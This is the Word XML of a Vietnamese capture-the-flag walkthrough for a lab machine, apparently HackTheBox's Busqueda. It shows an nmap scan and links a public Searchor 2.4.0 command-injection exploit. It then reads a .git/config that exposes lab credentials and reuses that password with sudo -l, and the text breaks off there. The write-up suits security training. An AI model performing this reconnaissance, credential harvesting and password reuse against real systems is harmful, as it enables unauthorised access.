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5275" w14:textId="5D94BA2A" w:rsidR="007D568C" w:rsidRPr="007D568C" w:rsidRDefault="007D568C" w:rsidP="007D568C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D568C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tên</w:t>
      </w:r>
      <w:r w:rsidRPr="007D568C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Quách vĩnh thạnh (aka Sheng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806B27E" w14:textId="04C71CE6" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="000D5854" w:rsidP="000D5854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val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Busqueda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2"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:id w:val="-1510367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B24E4" w14:textId="4A5C8CD4" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="000D5854" w:rsidP="000D585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r w:rsidRPr="00147C0B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Mục</w:t>
          </w:r>
          <w:r w:rsidRPr="00147C0B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
            <w:t xml:space="preserve"> lục</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0B0F2724" w14:textId="2C175582" w:rsidR="007D568C" w:rsidRPr="007D568C" w:rsidRDefault="000D585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147C0B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00147C0B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47C0B">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc152350948" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>1. Technicals Details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48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 w:rsidR="0063447B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1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5F5D4CC5" w14:textId="5C792D5C" w:rsidR="007D568C" w:rsidRP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49" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>1.1. Reconnaissance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49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1957005A" w14:textId="1104F1F5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0" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Nmap scan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0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39B54DEB" w14:textId="241B75AB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1" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Web page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1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7B7B064F" w14:textId="13D2F1ED" w:rsidR="007D568C" w:rsidRP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2" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1. Initial Access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2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39AE1204" w14:textId="42C6E5C2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3" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE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3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65F5ED1B" w14:textId="547F281C" w:rsidR="007D568C" w:rsidRP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4" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2. Privilege Escalation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4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269613DB" w14:textId="0C9258A8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5" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Enumeration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5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66847360" w14:textId="292A0317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6" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Credential stuffing 1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6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024B1A46" w14:textId="6B8468FA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7" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>SUID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7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163B8E3A" w14:textId="3A0A861F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8" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Credential stuffing 2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8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05CC13A7" w14:textId="5ABEECE2" w:rsidR="007D568C" w:rsidRPr="007D568C" w:rsidRDefault="0063447B">
          <w:pPr>
            <w:pStyle w:val="TOC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59" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Root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59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011AAA37" w14:textId="3434422E" w:rsidR="007D568C" w:rsidRPr="007D568C" w:rsidRDefault="0063447B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60" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Summary - Mapping MITRE ATT&amp;CK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60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7700AA76" w14:textId="2B7556BD" w:rsidR="007D568C" w:rsidRP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61" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Reconnaissance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61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6F9870B2" w14:textId="7BCEC99D" w:rsidR="007D568C" w:rsidRP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62" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Discovery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62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46283D65" w14:textId="38B8C242" w:rsidR="007D568C" w:rsidRDefault="0063447B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52350963" w:history="1">
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152350963 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007D568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007D568C" w:rsidRPr="007D56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568C" w:rsidRPr="007D568C">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E92166A" w14:textId="10C838B7" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="000D5854" w:rsidP="000D5854">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00147C0B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D337143" w14:textId="02DF9FEB" w:rsidR="00835C8F" w:rsidRPr="0063447B" w:rsidRDefault="00835C8F" w:rsidP="00835C8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0000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc152350948"/>
      <w:r w:rsidRPr="0063447B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Technicals Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="198D03D7" w14:textId="77777777" w:rsidR="00835C8F" w:rsidRPr="0063447B" w:rsidRDefault="00835C8F" w:rsidP="00835C8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bookmarkStart w:id="1" w:name="_Toc152350949"/>
      <w:r w:rsidRPr="0063447B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.1. Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="51D9032E" w14:textId="77777777" w:rsidR="00835C8F" w:rsidRPr="0063447B" w:rsidRDefault="00835C8F" w:rsidP="00835C8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Cs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc152350950"/>
      <w:r w:rsidRPr="0063447B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="223F0050" w14:textId="3A93D493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 xml:space="preserve">$ sudo nmap -sS -sC -sV -p- 10.129.228.217        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBC045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Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 03:57 EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C14A6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Nmap scan report for 10.129.228.217</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880E844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Host is up (0.23s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B48E1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Not shown: 998 closed tcp ports (conn-refused)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07A0D9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PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B29F1E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22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F0628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t>80/tcp open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EC1894" w14:textId="77777777" w:rsidR="00F136EF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</w:p>
    <w:p w14:paraId="7DE2E21B" w14:textId="544ED20F" w:rsidR="00484B7B" w:rsidRPr="00147C0B" w:rsidRDefault="00F136EF" w:rsidP="00F136EF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B19CFB" w14:textId="7F9E7FBE" w:rsidR="00F136EF" w:rsidRPr="00F136EF" w:rsidRDefault="00F136EF" w:rsidP="0001109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F136EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Phân tích kết quả của nmap, ta có các thông tin đáng chú ý sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E02E7C" w14:textId="77777777" w:rsidR="00F136EF" w:rsidRPr="00F136EF" w:rsidRDefault="00F136EF" w:rsidP="00F136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F136EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Có các services: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14643B11" w14:textId="54DA8D36" w:rsidR="00F136EF" w:rsidRPr="00F136EF" w:rsidRDefault="00F136EF" w:rsidP="00F13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147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSH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port 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AC3DB" w14:textId="6A0AF46F" w:rsidR="00F136EF" w:rsidRPr="00F136EF" w:rsidRDefault="00F136EF" w:rsidP="00F13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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dịch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vụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web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port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0184A5" w14:textId="4256B3A7" w:rsidR="00011093" w:rsidRPr="00147C0B" w:rsidRDefault="00011093" w:rsidP="0001109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000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc152350951"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Web page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="298AB603" w14:textId="20F03135" w:rsidR="00011093" w:rsidRPr="00147C0B" w:rsidRDefault="00011093" w:rsidP="00011093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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4494DA12" wp14:editId="1D7EB4F1">
            <wp:extent cx="4214225" cy="1691787"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1" name="Picture 1" descr="A screenshot of a social medi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80D6" w14:textId="77777777" w:rsidR="00011093" w:rsidRPr="00147C0B" w:rsidRDefault="00011093" w:rsidP="00011093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Ta thu được thông tin sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C85D0" w14:textId="6F362A56" w:rsidR="00011093" w:rsidRPr="00147C0B" w:rsidRDefault="005A7F90" w:rsidP="005A7F90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W</w:t>
      </w:r>
      <w:r w:rsidR="00011093" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>eb chạy backend bằng Flask của python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CCA1C9" w14:textId="2DC3EE14" w:rsidR="005A7F90" w:rsidRPr="00147C0B" w:rsidRDefault="005A7F90" w:rsidP="005A7F90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ử dụng phiên bảng Searchor 2.4.0 ( có lỗ hỏng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03868C5A" w14:textId="6DBD249B" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="0063447B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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="0005243D" w:rsidRPr="00147C0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C46ADB4" w14:textId="7848D1F1" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="0005243D" w:rsidP="0005243D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc152350952"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1. Initial Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7E82A0E9" w14:textId="2CF0A3B9" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="0005243D" w:rsidP="0005243D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc152350953"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1FAA51F9" w14:textId="72299895" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="0005243D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earch trên google về lỗ hổng của 2.4.0 được link PoC sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06040C0E" w14:textId="77777777" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="0063447B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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="0005243D" w:rsidRPr="00147C0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74F2145C" w14:textId="439D5973" w:rsidR="0005243D" w:rsidRPr="00147C0B" w:rsidRDefault="009E35E3" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="36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Chạy theo hướng dẫn ta được shell (svc@busqueda):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C6E5B" w14:textId="2CDDD018" w:rsidR="00011093" w:rsidRPr="00147C0B" w:rsidRDefault="009E35E3" w:rsidP="00011093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6D8E5CA3" wp14:editId="225D164B">
            <wp:extent cx="5760720" cy="147129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54E" w14:textId="573477E3" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="009E35E3" w:rsidP="009E35E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc152350954"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.2. Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="25C048AF" w14:textId="625CEBFF" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="0007453A" w:rsidP="0007453A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7" w:name="_Toc152350955"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6BDAC59F" w14:textId="5CB121C9" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="00733976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Ta thu được thông tin sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38F581" w14:textId="66E0EA3E" w:rsidR="001D1232" w:rsidRPr="00147C0B" w:rsidRDefault="001D1232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Tồn tại đường dẫn /var/www/app/.git/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431138E7" w14:textId="024C12BE" w:rsidR="001D1232" w:rsidRPr="00147C0B" w:rsidRDefault="001D1232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lastRenderedPageBreak/>
        <w:t>Đọc file config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEEA9B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vc@busqueda:/var/www/app/.git$ cat config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAF374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cat config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A9D5B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[core]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A837B68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repositoryformatversion = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01222C56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filemode = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B93C5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bare = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230ACB5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logallrefupdates = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E6D51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[remote "origin"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1194782F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url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3644E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fetch = +refs/heads/*:refs/remotes/origin/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBA92A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[branch "main"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61558184" w14:textId="77777777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remote = origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD17D82" w14:textId="18A3FFA3" w:rsidR="001D1232" w:rsidRPr="00147C0B" w:rsidRDefault="001D1232" w:rsidP="001D1232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   merge = refs/heads/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692E1A9" w14:textId="6893373A" w:rsidR="001D1232" w:rsidRPr="00147C0B" w:rsidRDefault="001D1232" w:rsidP="001D1232">
      <w:pPr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Ta thu được credentials: </w:t>
      </w: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cody:jh1usoih2bkjaspwe92</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA8B74" w14:textId="7B1F6FBD" w:rsidR="00D26A59" w:rsidRPr="00147C0B" w:rsidRDefault="00D26A59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Đường dẫn: gitea.searcher.htb ( thêm vào /etc/hosts và truy cập vào web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E9B4D" w14:textId="7AFD75A7" w:rsidR="00B3429F" w:rsidRPr="00147C0B" w:rsidRDefault="00B3429F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cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA810D7" wp14:editId="154FEEB4">
            <wp:extent cx="5760720" cy="32404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FEF0" w14:textId="06A95377" w:rsidR="00E20AB8" w:rsidRPr="00147C0B" w:rsidRDefault="00E20AB8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cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F5E1A9" wp14:editId="0B9FA5D3">
            <wp:extent cx="5760720" cy="324040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DE" w14:textId="130EE80C" w:rsidR="006D6673" w:rsidRPr="00147C0B" w:rsidRDefault="006D6673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Đăng nhập thành công vào web với tài khoản cody thu được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE8DEEA" w14:textId="7165C540" w:rsidR="006D6673" w:rsidRPr="00147C0B" w:rsidRDefault="00E20AB8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Tồn tại user: administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9A91A" w14:textId="11DA41EE" w:rsidR="00D26A59" w:rsidRPr="00147C0B" w:rsidRDefault="006D6673" w:rsidP="006D6673">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc152350956"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Credential stuffing</w:t>
      </w:r>
      <w:r w:rsidR="00C10F6F" w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="37364BE5" w14:textId="7919E49F" w:rsidR="00944977" w:rsidRPr="00147C0B" w:rsidRDefault="00944977" w:rsidP="001D1232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Dùng password trên chạy: sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554C70C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vc@busqueda:/var/www/app/.git$ sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064E570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udo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2C300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[sudo] password for svc: jh1usoih2bkjaspwe92</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBFE045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</w:p>
    <w:p w14:paraId="3F0B87EA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Matching Defaults entries for svc on busqueda:</w:t>
